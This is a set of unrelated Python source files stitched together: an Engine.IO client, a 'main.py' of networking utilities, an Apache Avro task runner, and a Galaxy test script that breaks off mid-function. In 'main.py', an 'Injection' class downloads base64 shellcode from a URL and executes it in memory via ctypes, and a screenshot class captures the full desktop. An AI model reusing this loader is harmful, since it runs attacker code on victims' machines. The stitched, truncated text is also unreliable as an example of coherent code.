threading.current_thread() == threading.main_thread():
original_signal_handler = signal.signal(signal.SIGINT,
signal_handler)
self.handlers = {}
self.base_url = None
self.transports = None
self.current_transport = None
self.sid = None
self.upgrades = None
self.ping_interval = None
self.ping_timeout = None
self.pong_received = True
self.http = http_session
self.ws = None
self.read_loop_task = None
self.write_loop_task = None
self.ping_loop_task = None
self.ping_loop_event = None
self.queue = None
self.state = 'disconnected'
self.ssl_verify = ssl_verify
if json is not None:
packet.Packet.json = json
if not isinstance(logger, bool):
self.logger = logger
else:
self.logger = default_logger
if not logging.root.handlers and \
self.logger.level == logging.NOTSET:
if logger:
self.logger.setLevel(logging.INFO)
else:
self.logger.setLevel(logging.ERROR)
self.logger.addHandler(logging.StreamHandler())
self.request_timeout = request_timeout
def is_asyncio_based(self):
return False
def on(self, event, handler=None):
"""Register an event handler.
:param event: The event name. Can be ``'connect'``, ``'message'`` or
``'disconnect'``.
:param handler: The function that should be invoked to handle the
event. When this parameter is not given, the method
acts as a decorator for the handler function.
Example usage::
# as a decorator:
@eio.on('connect')
def connect_handler():
print('Connection request')
# as a method:
def message_handler(msg):
print('Received message: ', msg)
eio.send('response')
eio.on('message', message_handler)
"""
if event not in self.event_names:
raise ValueError('Invalid event')
def set_handler(handler):
self.handlers[event] = handler
return handler
if handler is None:
return set_handler
set_handler(handler)
def connect(self, url, headers=None, transports=None,
engineio_path='engine.io'):
"""Connect to an Engine.IO server.
:param url: The URL of the Engine.IO server. It can include custom
query string parameters if required by the server.
:param headers: A dictionary with custom headers to send with the
connection request.
:param transports: The list of allowed transports. Valid transports
are ``'polling'`` and ``'websocket'``. If not
given, the polling transport is connected first,
then an upgrade to websocket is attempted.
:param engineio_path: The endpoint where the Engine.IO server is
installed. The default value is appropriate for
most cases.
Example usage::
eio = engineio.Client()
eio.connect('http://localhost:5000')
"""
if self.state != 'disconnected':
raise ValueError('Client is not in a disconnected state')
valid_transports = ['polling', 'websocket']
if transports is not None:
if isinstance(transports, six.string_types):
transports = [transports]
transports = [transport for transport in transports
if transport in valid_transports]
if not transports:
raise ValueError('No valid transports provided')
self.transports = transports or valid_transports
self.queue = self.create_queue()
return getattr(self, '_connect_' + self.transports[0])(
url, headers or {}, engineio_path)
def wait(self):
"""Wait until the connection with the server ends.
Client applications can use this function to block the main thread
during the life of the connection.
"""
if self.read_loop_task:
self.read_loop_task.join()
def send(self, data, binary=None):
"""Send a message to a client.
:param data: The data to send to the client. Data can be of type
``str``, ``bytes``, ``list`` or ``dict``. If a ``list``
or ``dict``, the data will be serialized as JSON.
:param binary: ``True`` to send packet as binary, ``False`` to send
as text. If not given, unicode (Python 2) and str
(Python 3) are sent as text, and str (Python 2) and
bytes (Python 3) are sent as binary.
"""
self._send_packet(packet.Packet(packet.MESSAGE, data=data,
binary=binary))
def disconnect(self, abort=False):
"""Disconnect from the server.
:param abort: If set to ``True``, do not wait for background tasks
associated with the connection to end.
"""
if self.state == 'connected':
self._send_packet(packet.Packet(packet.CLOSE))
self.queue.put(None)
self.state = 'disconnecting'
self._trigger_event('disconnect', run_async=False)
if self.current_transport == 'websocket':
self.ws.close()
if not abort:
self.read_loop_task.join()
self.state = 'disconnected'
try:
connected_clients.remove(self)
except ValueError: # pragma: no cover
pass
self._reset()
def transport(self):
"""Return the name of the transport currently in use.
The possible values returned by this function are ``'polling'`` and
``'websocket'``.
"""
return self.current_transport
def start_background_task(self, target, *args, **kwargs):
"""Start a background task.
This is a utility function that applications can use to start a
background task.
:param target: the target function to execute.
:param args: arguments to pass to the function.
:param kwargs: keyword arguments to pass to the function.
This function returns an object compatible with the `Thread` class in
the Python standard library. The `start()` method on this object is
already called by this function.
"""
th = threading.Thread(target=target, args=args, kwargs=kwargs)
th.start()
return th
def sleep(self, seconds=0):
"""Sleep for the requested amount of time."""
return time.sleep(seconds)
def create_queue(self, *args, **kwargs):
"""Create a queue object."""
q = queue.Queue(*args, **kwargs)
q.Empty = queue.Empty
return q
def create_event(self, *args, **kwargs):
"""Create an event object."""
return threading.Event(*args, **kwargs)
def _reset(self):
self.state = 'disconnected'
self.sid = None
def _connect_polling(self, url, headers, engineio_path):
"""Establish a long-polling connection to the Engine.IO server."""
if requests is None: # pragma: no cover
# not installed
self.logger.error('requests package is not installed -- cannot '
'send HTTP requests!')
return
self.base_url = self._get_engineio_url(url, engineio_path, 'polling')
self.logger.info('Attempting polling connection to ' + self.base_url)
r = self._send_request(
'GET', self.base_url + self._get_url_timestamp(), headers=headers,
timeout=self.request_timeout)
if r is None:
self._reset()
raise exceptions.ConnectionError(
'Connection refused by the server')
if r.status_code < 200 or r.status_code >= 300:
self._reset()
try:
arg = r.json()
except JSONDecodeError:
arg = None
raise exceptions.ConnectionError(
'Unexpected status code {} in server response'.format(
r.status_code), arg)
try:
p = payload.Payload(encoded_payload=r.content)
except ValueError:
six.raise_from(exceptions.ConnectionError(
'Unexpected response from server'), None)
open_packet = p.packets[0]
if open_packet.packet_type != packet.OPEN:
raise exceptions.ConnectionError(
'OPEN packet not returned by server')
self.logger.info(
'Polling connection accepted with ' + str(open_packet.data))
self.sid = open_packet.data['sid']
self.upgrades = open_packet.data['upgrades']
self.ping_interval = int(open_packet.data['pingInterval']) / 1000.0
self.ping_timeout = int(open_packet.data['pingTimeout']) / 1000.0
self.current_transport = 'polling'
self.base_url += '&sid=' + self.sid
self.state = 'connected'
connected_clients.append(self)
self._trigger_event('connect', run_async=False)
for pkt in p.packets[1:]:
self._receive_packet(pkt)
if 'websocket' in self.upgrades and 'websocket' in self.transports:
# attempt to upgrade to websocket
if self._connect_websocket(url, headers, engineio_path):
# upgrade to websocket succeeded, we're done here
return
# start background tasks associated with this client
self.ping_loop_task = self.start_background_task(self._ping_loop)
self.write_loop_task = self.start_background_task(self._write_loop)
self.read_loop_task = self.start_background_task(
self._read_loop_polling)
def _connect_websocket(self, url, headers, engineio_path):
"""Establish or upgrade to a WebSocket connection with the server."""
if websocket is None: # pragma: no cover
# not installed
self.logger.warning('websocket-client package not installed, only '
'polling transport is available')
return False
websocket_url = self._get_engineio_url(url, engineio_path, 'websocket')
if self.sid:
self.logger.info(
'Attempting WebSocket upgrade to ' + websocket_url)
upgrade = True
websocket_url += '&sid=' + self.sid
else:
upgrade = False
self.base_url = websocket_url
self.logger.info(
'Attempting WebSocket connection to ' + websocket_url)
# get cookies and other settings from the long-polling connection
# so that they are preserved when connecting to the WebSocket route
cookies = None
extra_options = {}
if self.http:
# cookies
cookies = '; '.join(["{}={}".format(cookie.name, cookie.value)
for cookie in self.http.cookies])
for header, value in headers.items():
if header.lower() == 'cookie':
if cookies:
cookies += '; '
cookies += value
del headers[header]
break
# auth
if 'Authorization' not in headers and self.http.auth is not None:
if not isinstance(self.http.auth, tuple): # pragma: no cover
raise ValueError('Only basic authentication is supported')
basic_auth = '{}:{}'.format(
self.http.auth[0], self.http.auth[1]).encode('utf-8')
basic_auth = b64encode(basic_auth).decode('utf-8')
headers['Authorization'] = 'Basic ' + basic_auth
# cert
# this can be given as ('certfile', 'keyfile') or just 'certfile'
if isinstance(self.http.cert, tuple):
extra_options['sslopt'] = {
'certfile': self.http.cert[0],
'keyfile': self.http.cert[1]}
elif self.http.cert:
extra_options['sslopt'] = {'certfile': self.http.cert}
# proxies
if self.http.proxies:
proxy_url = None
if websocket_url.startswith('ws://'):
proxy_url = self.http.proxies.get(
'ws', self.http.proxies.get('http'))
else: # wss://
proxy_url = self.http.proxies.get(
'wss', self.http.proxies.get('https'))
if proxy_url:
parsed_url = urllib.parse.urlparse(
proxy_url if '://' in proxy_url
else 'scheme://' + proxy_url)
print(parsed_url)
extra_options['http_proxy_host'] = parsed_url.hostname
extra_options['http_proxy_port'] = parsed_url.port
extra_options['http_proxy_auth'] = (
(parsed_url.username, parsed_url.password)
if parsed_url.username or parsed_url.password
else None)
# verify
if not self.http.verify:
self.ssl_verify = False
if not self.ssl_verify:
extra_options['sslopt'] = {"cert_reqs": ssl.CERT_NONE}
try:
ws = websocket.create_connection(
websocket_url + self._get_url_timestamp(), header=headers,
cookie=cookies, enable_multithread=True, **extra_options)
except (ConnectionError, IOError, websocket.WebSocketException):
if upgrade:
self.logger.warning(
'WebSocket upgrade failed: connection error')
return False
else:
raise exceptions.ConnectionError('Connection error')
if upgrade:
p = packet.Packet(packet.PING,
data=six.text_type('probe')).encode()
try:
ws.send(p)
except Exception as e: # pragma: no cover
self.logger.warning(
'WebSocket upgrade failed: unexpected send exception: %s',
str(e))
return False
try:
p = ws.recv()
except Exception as e: # pragma: no cover
self.logger.warning(
'WebSocket upgrade failed: unexpected recv exception: %s',
str(e))
return False
pkt = packet.Packet(encoded_packet=p)
if pkt.packet_type != packet.PONG or pkt.data != 'probe':
self.logger.warning(
'WebSocket upgrade failed: no PONG packet')
return False
p = packet.Packet(packet.UPGRADE).encode()
try:
ws.send(p)
except Exception as e: # pragma: no cover
self.logger.warning(
'WebSocket upgrade failed: unexpected send exception: %s',
str(e))
return False
self.current_transport = 'websocket'
self.logger.info('WebSocket upgrade was successful')
else:
try:
p = ws.recv()
except Exception as e: # pragma: no cover
raise exceptions.ConnectionError(
'Unexpected recv exception: ' + str(e))
open_packet = packet.Packet(encoded_packet=p)
if open_packet.packet_type != packet.OPEN:
raise exceptions.ConnectionError('no OPEN packet')
self.logger.info(
'WebSocket connection accepted with ' + str(open_packet.data))
self.sid = open_packet.data['sid']
self.upgrades = open_packet.data['upgrades']
self.ping_interval = int(open_packet.data['pingInterval']) / 1000.0
self.ping_timeout = int(open_packet.data['pingTimeout']) / 1000.0
self.current_transport = 'websocket'
self.state = 'connected'
connected_clients.append(self)
self._trigger_event('connect', run_async=False)
self.ws = ws
# start background tasks associated with this client
self.ping_loop_task = self.start_background_task(self._ping_loop)
self.write_loop_task = self.start_background_task(self._write_loop)
self.read_loop_task = self.start_background_task(
self._read_loop_websocket)
return True
def _receive_packet(self, pkt):
"""Handle incoming packets from the server."""
packet_name = packet.packet_names[pkt.packet_type] \
if pkt.packet_type < len(packet.packet_names) else 'UNKNOWN'
self.logger.info(
'Received packet %s data %s', packet_name,
pkt.data if not isinstance(pkt.data, bytes) else '<binary>')
if pkt.packet_type == packet.MESSAGE:
self._trigger_event('message', pkt.data, run_async=True)
elif pkt.packet_type == packet.PONG:
self.pong_received = True
elif pkt.packet_type == packet.CLOSE:
self.disconnect(abort=True)
elif pkt.packet_type == packet.NOOP:
pass
else:
self.logger.error('Received unexpected packet of type %s',
pkt.packet_type)
def _send_packet(self, pkt):
"""Queue a packet to be sent to the server."""
if self.state != 'connected':
return
self.queue.put(pkt)
self.logger.info(
'Sending packet %s data %s',
packet.packet_names[pkt.packet_type],
pkt.data if not isinstance(pkt.data, bytes) else '<binary>')
def _send_request(
self, method, url, headers=None, body=None,
timeout=None): # pragma: no cover
if self.http is None:
self.http = requests.Session()
try:
return self.http.request(method, url, headers=headers, data=body,
timeout=timeout, verify=self.ssl_verify)
except requests.exceptions.RequestException as exc:
self.logger.info('HTTP %s request to %s failed with error %s.',
method, url, exc)
def _trigger_event(self, event, *args, **kwargs):
"""Invoke an event handler."""
run_async = kwargs.pop('run_async', False)
if event in self.handlers:
if run_async:
return self.start_background_task(self.handlers[event], *args)
else:
try:
return self.handlers[event](*args)
except:
self.logger.exception(event + ' handler error')
def _get_engineio_url(self, url, engineio_path, transport):
"""Generate the Engine.IO connection URL."""
engineio_path = engineio_path.strip('/')
parsed_url = urllib.parse.urlparse(url)
if transport == 'polling':
scheme = 'http'
elif transport == 'websocket':
scheme = 'ws'
else: # pragma: no cover
raise ValueError('invalid transport')
if parsed_url.scheme in ['https', 'wss']:
scheme += 's'
return ('{scheme}://{netloc}/{path}/?{query}'
'{sep}transport={transport}&EIO=3').format(
scheme=scheme, netloc=parsed_url.netloc,
path=engineio_path, query=parsed_url.query,
sep='&' if parsed_url.query else '',
transport=transport)
def _get_url_timestamp(self):
"""Generate the Engine.IO query string timestamp."""
return '&t=' + str(time.time())
def _ping_loop(self):
"""This background task sends a PING to the server at the requested
interval.
"""
self.pong_received = True
if self.ping_loop_event is None:
self.ping_loop_event = self.create_event()
else:
self.ping_loop_event.clear()
while self.state == 'connected':
if not self.pong_received:
self.logger.info(
'PONG response has not been received, aborting')
if self.ws:
self.ws.close(timeout=0)
self.queue.put(None)
break
self.pong_received = False
self._send_packet(packet.Packet(packet.PING))
self.ping_loop_event.wait(timeout=self.ping_interval)
self.logger.info('Exiting ping task')
def _read_loop_polling(self):
"""Read packets by polling the Engine.IO server."""
while self.state == 'connected':
self.logger.info(
'Sending polling GET request to ' + self.base_url)
r = self._send_request(
'GET', self.base_url + self._get_url_timestamp(),
timeout=max(self.ping_interval, self.ping_timeout) + 5)
if r is None:
self.logger.warning(
'Connection refused by the server, aborting')
self.queue.put(None)
break
if r.status_code < 200 or r.status_code >= 300:
self.logger.warning('Unexpected status code %s in server '
'response, aborting', r.status_code)
self.queue.put(None)
break
try:
p = payload.Payload(encoded_payload=r.content)
except ValueError:
self.logger.warning(
'Unexpected packet from server, aborting')
self.queue.put(None)
break
for pkt in p.packets:
self._receive_packet(pkt)
self.logger.info('Waiting for write loop task to end')
self.write_loop_task.join()
self.logger.info('Waiting for ping loop task to end')
if self.ping_loop_event: # pragma: no cover
self.ping_loop_event.set()
self.ping_loop_task.join()
if self.state == 'connected':
self._trigger_event('disconnect', run_async=False)
try:
connected_clients.remove(self)
except ValueError: # pragma: no cover
pass
self._reset()
self.logger.info('Exiting read loop task')
def _read_loop_websocket(self):
"""Read packets from the Engine.IO WebSocket connection."""
while self.state == 'connected':
p = None
try:
p = self.ws.recv()
except websocket.WebSocketConnectionClosedException:
self.logger.warning(
'WebSocket connection was closed, aborting')
self.queue.put(None)
break
except Exception as e:
self.logger.info(
'Unexpected error receiving packet: "%s", aborting',
str(e))
self.queue.put(None)
break
if isinstance(p, six.text_type): # pragma: no cover
p = p.encode('utf-8')
try:
pkt = packet.Packet(encoded_packet=p)
except Exception as e: # pragma: no cover
self.logger.info(
'Unexpected error decoding packet: "%s", aborting', str(e))
self.queue.put(None)
break
self._receive_packet(pkt)
self.logger.info('Waiting for write loop task to end')
self.write_loop_task.join()
self.logger.info('Waiting for ping loop task to end')
if self.ping_loop_event: # pragma: no cover
self.ping_loop_event.set()
self.ping_loop_task.join()
if self.state == 'connected':
self._trigger_event('disconnect', run_async=False)
try:
connected_clients.remove(self)
except ValueError: # pragma: no cover
pass
self._reset()
self.logger.info('Exiting read loop task')
def _write_loop(self):
"""This background task sends packages to the server as they are
pushed to the send queue.
"""
while self.state == 'connected':
# to simplify the timeout handling, use the maximum of the
# ping interval and ping timeout as timeout, with an extra 5
# seconds grace period
timeout = max(self.ping_interval, self.ping_timeout) + 5
packets = None
try:
packets = [self.queue.get(timeout=timeout)]
except self.queue.Empty:
self.logger.error('packet queue is empty, aborting')
break
if packets == [None]:
self.queue.task_done()
packets = []
else:
while True:
try:
packets.append(self.queue.get(block=False))
except self.queue.Empty:
break
if packets[-1] is None:
packets = packets[:-1]
self.queue.task_done()
break
if not packets:
# empty packet list returned -> connection closed
break
if self.current_transport == 'polling':
p = payload.Payload(packets=packets)
r = self._send_request(
'POST', self.base_url, body=p.encode(),
headers={'Content-Type': 'application/octet-stream'},
timeout=self.request_timeout)
for pkt in packets:
self.queue.task_done()
if r is None:
self.logger.warning(
'Connection refused by the server, aborting')
break
if r.status_code < 200 or r.status_code >= 300:
self.logger.warning('Unexpected status code %s in server '
'response, aborting', r.status_code)
self._reset()
break
else:
# websocket
try:
for pkt in packets:
encoded_packet = pkt.encode(always_bytes=False)
if pkt.binary:
self.ws.send_binary(encoded_packet)
else:
self.ws.send(encoded_packet)
self.queue.task_done()
except (websocket.WebSocketConnectionClosedException,
BrokenPipeError, OSError):
self.logger.warning(
'WebSocket connection was closed, aborting')
break
self.logger.info('Exiting write loop task')
|
main.py | # database => http://geolite.maxmind.com/download/geoip/database/GeoLiteCity.dat.gz
# pip install pygeoip => this repo deprecated yet still works
# pip install dpkt => packet creation / parsing, with definitions for the basic TCP/IP protocols
# pip install scapy => packet creation / parsing
# pip install IPy => IPTEST
import pygeoip as pg
import dpkt
import socket
from scapy.all import *
from IPy import IP as IPTEST
GEO_IP_DATABASE_URL = '/opt/geoip/Geo.dat'
MAX_HOP_DIFFERENCE = 5 # threshold for ttl difference
def getIpInfo(targetIp):
return pg.GeoIP(GEO_IP_DATABASE_URL).record_by_name(targetIp)
def analysePcap(pcapFilePath):
pcapFileHandler = open(pcapFilePath)
pcapInfo = dpkt.pcap.Reader(pcapFileHandler)
for (timestamp, packet) in pcapInfo:
try:
eth = dpkt.ethernet.Ethernet(packet) # physical and data link layers
ip = eth.data
source = socket.inet_ntoa(ip.src)
destination = socket.inet_ntoa(ip.dst)
ipInfoSrc = getIpInfo(source)
ipInfoDst = getIpInfo(destination)
print 'From: ' + source + ' to: ' + destination + '\n'
print ipInfoSrc['city'] + ', ' + ipInfoSrc['country_code3'] + ' --> ' + ipInfoDst['city'] + ', ' + ipInfoDst['country_code3']
print '---------------------------------------\n'
except:
pass
def checkTTL(ipSrc, ttl):
ttlValues = {}
if IPTEST(ipSrc).iptype == 'PRIVATE':
return
if ipSrc not in ttlValues:
packet = sr1(IP(dst=ipSrc) / ICMP(), retry=0, timeout=1, verbose=0)
ttlValues[ipSrc] = packet.ttl
if abs(int(ttl) - int(ttlValues[ipSrc])) > MAX_HOP_DIFFERENCE:
print 'Detected possible spoofed packet from: ' + ipSrc
print 'TTL: ' + ttl + ' Actual TTL: ' + str(ttlValues[ipSrc])
def watchTTL(packet):
try:
if packet.haslayer(IP):
ipSrc = packet.getlayer(IP).src
ttl = str(packet.ttl)
checkTTL(ipSrc, ttl)
# print 'Packet received from: ' + ipSrc + ' with TTL: ' + ttl
except:
pass
def simpleTCPClient(host="www.google.com", port=80):
import socket
targetHost = host
targetPort = port
client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
client.connect((targetHost, targetPort))
client.send('GET / HTTP/1.1\nHost: google.com\n\n')
response = client.recv(4096)
print response
def simpleUDPClient():
import socket
targetHost = "127.0.0.1"
targetPort = 80
client = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
client.sendto("AABBTTFFWW", (targetHost, targetPort))
data, addr = client.recvfrom(4096)
print data
print addr
def handleTCPClient(clientSocket):
request = clientSocket.recv(1024)
print 'Received: %s' %request
clientSocket.send('ACK');
clientSocket.close()
def TCPServer():
import socket
import threading
bindIP = "0.0.0.0"
bindPort = 9999
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server.bind((bindIP, bindPort))
server.listen(5)
while True:
client, addr = server.accept()
print 'Accepted connection from: %s:%d' %(addr[0], addr[1])
clientHandler = threading.Thread(target=handleTCPClient, args=(client,))
clientHandler.start()
class SSManager(object):
def take_ss(self, pathToSS):
import win32gui
import win32ui
import win32con
import win32api
hdesktop = win32gui.GetDesktopWindow()
width = win32api.GetSystemMetrics(win32con.SM_CXVIRTUALSCREEN)
height = win32api.GetSystemMetrics(win32con.SM_CYVIRTUALSCREEN)
left = win32api.GetSystemMetrics(win32con.SM_XVIRTUALSCREEN)
top = win32api.GetSystemMetrics(win32con.SM_YVIRTUALSCREEN)
desktop_dc = win32gui.GetWindowDC(hdesktop)
img_dc = win32ui.CreateDCFromHandle(desktop_dc)
mem_dc = img_dc.CreateCompatibleDC()
screenshot = win32ui.CreateBitmap()
screenshot.CreateCompatibleBitmap(img_dc, width, height)
mem_dc.SelectObject(screenshot)
mem_dc.BitBlt((0, 0), (width, height), img_dc, (left, top), win32con.SRCCOPY)
screenshot.SaveBitmapFile(mem_dc, pathToSS)
mem_dc.DeleteDC()
win32gui.DeleteObject(screenshot.GetHandle())
class Injection(object):
def inject(self, shellcode_url):
import urllib2
import ctypes
import base64
response = urllib2.urlopen(shellcode_url)
shellcode = base64.b64decode(response.read())
shellcode_buffer = ctypes.create_string_buffer(shellcode, len(shellcode))
shellcode_func = ctypes.cast(shellcode_buffer, ctypes.CFUNCTYPE(ctypes.c_void_p))
shellcode_func()
def main():
# {'city': u'Istanbul', 'region_code': u'34', 'area_code': 0, 'time_zone': 'Asia/Istanbul', 'dma_code': 0, 'metro_code': None, 'country_code3': 'TUR', 'latitude': 41.01859999999999, 'postal_code': None, 'longitude': 28.964699999999993, 'country_code': 'TR', 'country_name': 'Turkey', 'continent': 'EU'}
# print(getIpInfo('212.2.212.131'))
# sniff(prn=watchTTL, store=0)
# simpleTCPClient()
# simpleUDPClient()
# TCPServer()
if __name__ == '__main__':
main()
|
tether_task_runner.py | """
* Licensed to the Apache Software Foundation (ASF) under one
* or more contributor license agreements. See the NOTICE file
* distributed with this work for additional information
* regarding copyright ownership. The ASF licenses this file
* to you under the Apache License, Version 2.0 (the
* "License"); you may not use this file except in compliance
* with the License. You may obtain a copy of the License at
*
* https://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
"""
__all__=["TaskRunner"]
if __name__ == "__main__":
# Relative imports don't work when being run directly
from avro import tether
from avro.tether import TetherTask, find_port, inputProtocol
else:
from . import TetherTask, find_port, inputProtocol
from avro import ipc
from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer
import logging
import weakref
import threading
import sys
import traceback
class TaskRunnerResponder(ipc.Responder):
"""
The responder for the thethered process
"""
def __init__(self,runner):
"""
Param
----------------------------------------------------------
runner - Instance of TaskRunner
"""
ipc.Responder.__init__(self, inputProtocol)
self.log=logging.getLogger("TaskRunnerResponder")
# should we use weak references to avoid circular references?
# We use weak references b\c self.runner owns this instance of TaskRunnerResponder
if isinstance(runner,weakref.ProxyType):
self.runner=runner
else:
self.runner=weakref.proxy(runner)
self.task=weakref.proxy(runner.task)
def invoke(self, message, request):
try:
if message.name=='configure':
self.log.info("TetherTaskRunner: Recieved configure")
self.task.configure(request["taskType"],request["inSchema"],request["outSchema"])
elif message.name=='partitions':
self.log.info("TetherTaskRunner: Recieved partitions")
try:
self.task.set_partitions(request["partitions"])
except Exception as e:
self.log.error("Exception occured while processing the partitions message: Message:\n"+traceback.format_exc())
raise
elif message.name=='input':
self.log.info("TetherTaskRunner: Recieved input")
self.task.input(request["data"],request["count"])
elif message.name=='abort':
self.log.info("TetherTaskRunner: Recieved abort")
self.runner.close()
elif message.name=='complete':
self.log.info("TetherTaskRunner: Recieved complete")
self.task.complete()
self.task.close()
self.runner.close()
else:
self.log.warning("TetherTaskRunner: recieved unknown message {0}".format(message.name))
except Exception as e:
self.log.error("Error occured while processing message: {0}".format(message.name))
emsg=traceback.format_exc()
self.task.fail(emsg)
return None
def HTTPHandlerGen(runner):
"""
This is a class factory for the HTTPHandler. We need
a factory b\c we need a reference to the runner
Parameters
-----------------------------------------------------------------
runner - instance of the task runner
"""
if not(isinstance(runner,weakref.ProxyType)):
runnerref=weakref.proxy(runner)
else:
runnerref=runner
class TaskRunnerHTTPHandler(BaseHTTPRequestHandler):
"""Create a handler for the parent.
"""
runner=runnerref
def __init__(self,*args,**param):
"""
"""
BaseHTTPRequestHandler.__init__(self,*args,**param)
def do_POST(self):
self.responder =TaskRunnerResponder(self.runner)
call_request_reader = ipc.FramedReader(self.rfile)
call_request = call_request_reader.read_framed_message()
resp_body = self.responder.respond(call_request)
self.send_response(200)
self.send_header('Content-Type', 'avro/binary')
self.end_headers()
resp_writer = ipc.FramedWriter(self.wfile)
resp_writer.write_framed_message(resp_body)
return TaskRunnerHTTPHandler
class TaskRunner(object):
"""This class ties together the server handling the requests from
the parent process and the instance of TetherTask which actually
implements the logic for the mapper and reducer phases
"""
def __init__(self,task):
"""
Construct the runner
Parameters
---------------------------------------------------------------
task - An instance of tether task
"""
self.log=logging.getLogger("TaskRunner:")
if not(isinstance(task,TetherTask)):
raise ValueError("task must be an instance of tether task")
self.task=task
self.server=None
self.sthread=None
def start(self,outputport=None,join=True):
"""
Start the server
Parameters
-------------------------------------------------------------------
outputport - (optional) The port on which the parent process is listening
for requests from the task.
- This will typically be supplied by an environment variable
we allow it to be supplied as an argument mainly for debugging
join - (optional) If set to fault then we don't issue a join to block
until the thread excecuting the server terminates.
This is mainly for debugging. By setting it to false,
we can resume execution in this thread so that we can do additional
testing
"""
port=find_port()
address=("localhost",port)
def thread_run(task_runner=None):
task_runner.server = HTTPServer(address, HTTPHandlerGen(task_runner))
task_runner.server.allow_reuse_address = True
task_runner.server.serve_forever()
# create a separate thread for the http server
sthread=threading.Thread(target=thread_run,kwargs={"task_runner":self})
sthread.start()
self.sthread=sthread
# This needs to run in a separat thread b\c serve_forever() blocks
self.task.open(port,clientPort=outputport)
# wait for the other thread to finish
if (join):
self.task.ready_for_shutdown.wait()
self.server.shutdown()
# should we do some kind of check to make sure it exits
self.log.info("Shutdown the logger")
# shutdown the logging
logging.shutdown()
def close(self):
"""
Handler for the close message
"""
self.task.close()
if __name__ == '__main__':
# TODO::Make the logging level a parameter we can set
# logging.basicConfig(level=logging.INFO,filename='/tmp/log',filemode='w')
logging.basicConfig(level=logging.INFO)
if (len(sys.argv)<=1):
print "Error: tether_task_runner.__main__: Usage: tether_task_runner task_package.task_module.TaskClass"
raise ValueError("Usage: tether_task_runner task_package.task_module.TaskClass")
fullcls=sys.argv[1]
mod,cname=fullcls.rsplit(".",1)
logging.info("tether_task_runner.__main__: Task: {0}".format(fullcls))
modobj=__import__(mod,fromlist=cname)
taskcls=getattr(modobj,cname)
task=taskcls()
runner=TaskRunner(task=task)
runner.start()
|
functional_tests.py | #!/usr/bin/env python
import os
import sys
import shutil
import tempfile
import re
from ConfigParser import SafeConfigParser
# Assume we are run from the galaxy root directory, add lib to the python path
cwd = os.getcwd()
new_path = [ os.path.join( cwd, "lib" ), os.path.join( cwd, "test" ) ]
new_path.extend( sys.path[1:] )
sys.path = new_path
from base.tool_shed_util import parse_tool_panel_config
from galaxy import eggs
from galaxy.util.properties import load_app_properties
eggs.require( "nose" )
eggs.require( "NoseHTML" )
eggs.require( "NoseTestDiff" )
eggs.require( "twill==0.9" )
eggs.require( "Paste" )
eggs.require( "PasteDeploy" )
eggs.require( "Cheetah" )
# this should not be required, but it is under certain conditions, thanks to this bug:
# http://code.google.com/p/python-nose/issues/detail?id=284
eggs.require( "pysqlite" )
import atexit
import logging
import os.path
import twill
import unittest
import time
import subprocess
import threading
import random
import httplib
import socket
import urllib
from paste import httpserver
import galaxy.app
from galaxy.app import UniverseApplication
from galaxy.web import buildapp
from galaxy import tools
from galaxy.util import bunch
from galaxy import util
from galaxy.util.json import dumps
from functional import database_contexts
from base.api_util import get_master_api_key
from base.api_util import get_user_api_key
from base.nose_util import run
from base.instrument import StructuredTestDataPlugin
import nose.core
import nose.config
import nose.loader
import nose.plugins.manager
log = logging.getLogger( "functional_tests.py" )
default_galaxy_test_host = "localhost"
default_galaxy_test_port_min = 8000
default_galaxy_test_port_max = 9999
default_galaxy_locales = 'en'
default_galaxy_test_file_dir = "test-data"
migrated_tool_panel_config = 'config/migrated_tools_conf.xml'
installed_tool_panel_configs = [ 'config/shed_tool_conf.xml' ]
# should this serve static resources (scripts, images, styles, etc.)
STATIC_ENABLED = True
# Set up a job_conf.xml that explicitly limits jobs to 10 minutes.
job_conf_xml = '''<?xml version="1.0"?>
<!-- A test job config that explicitly configures job running the way it is configured by default (if there is no explicit config). -->
<job_conf>
<plugins>
<plugin id="local" type="runner" load="galaxy.jobs.runners.local:LocalJobRunner" workers="4"/>
</plugins>
<handlers>
<handler id="main"/>
</handlers>
<destinations>
<destination id="local" runner="local"/>
</destinations>
<limits>
<limit type="walltime">00:10:00</limit>
</limits>
</job_conf>
'''
def get_static_settings():
"""Returns dictionary of the settings necessary for a galaxy App
to be wrapped in the static middleware.
This mainly consists of the filesystem locations of url-mapped
static resources.
"""
cwd = os.getcwd()
static_dir = os.path.join( cwd, 'static' )
#TODO: these should be copied from config/galaxy.ini
return dict(
#TODO: static_enabled needed here?
static_enabled=True,
static_cache_time=360,
static_dir=static_dir,
static_images_dir=os.path.join( static_dir, 'images', '' ),
static_favicon_dir=os.path.join( static_dir, 'favicon.ico' ),
static_scripts_dir=os.path.join( static_dir, 'scripts', '' ),
static_style_dir=os.path.join( static_dir, 'june_2007_style', 'blue' ),
static_robots_txt=os.path.join( static_dir, 'robots.txt' ),
)
def get_webapp_global_conf():
"""Get the global_conf dictionary sent as the first argument to app_factory.
"""
# (was originally sent 'dict()') - nothing here for now except static settings
global_conf = dict()
if STATIC_ENABLED:
global_conf.update( get_static_settings() )
return global_conf
def generate_config_file( input_filename, output_filename, config_items ):
'''
Generate a config file with the configuration that has been defined for the embedded web application.
This is mostly relevant when setting metadata externally, since the script for doing that does not
have access to app.config.
'''
cp = SafeConfigParser()
cp.read( input_filename )
config_items_by_section = []
for label, value in config_items:
found = False
# Attempt to determine the correct section for this configuration option.
for section in cp.sections():
if cp.has_option( section, label ):
config_tuple = section, label, value
config_items_by_section.append( config_tuple )
found = True
continue
# Default to app:main if no section was found.
if not found:
config_tuple = 'app:main', label, value
config_items_by_section.append( config_tuple )
print( config_items_by_section )
# Replace the default values with the provided configuration.
for section, label, value in config_items_by_section:
if cp.has_option( section, label ):
cp.remove_option( section, label )
cp.set( section, label, str( value ) )
fh = open( output_filename, 'w' )
cp.write( fh )
fh.close()
def run_tests( test_config ):
return run( test_config )
def __copy_database_template( source, db_path ):
"""
Copy a 'clean' sqlite template database (from file or URL) to specified
database path.
"""
os.makedirs( os.path.dirname( db_path ) )
if os.path.exists( source ):
shutil.copy( source, db_path )
assert os.path.exists( db_path )
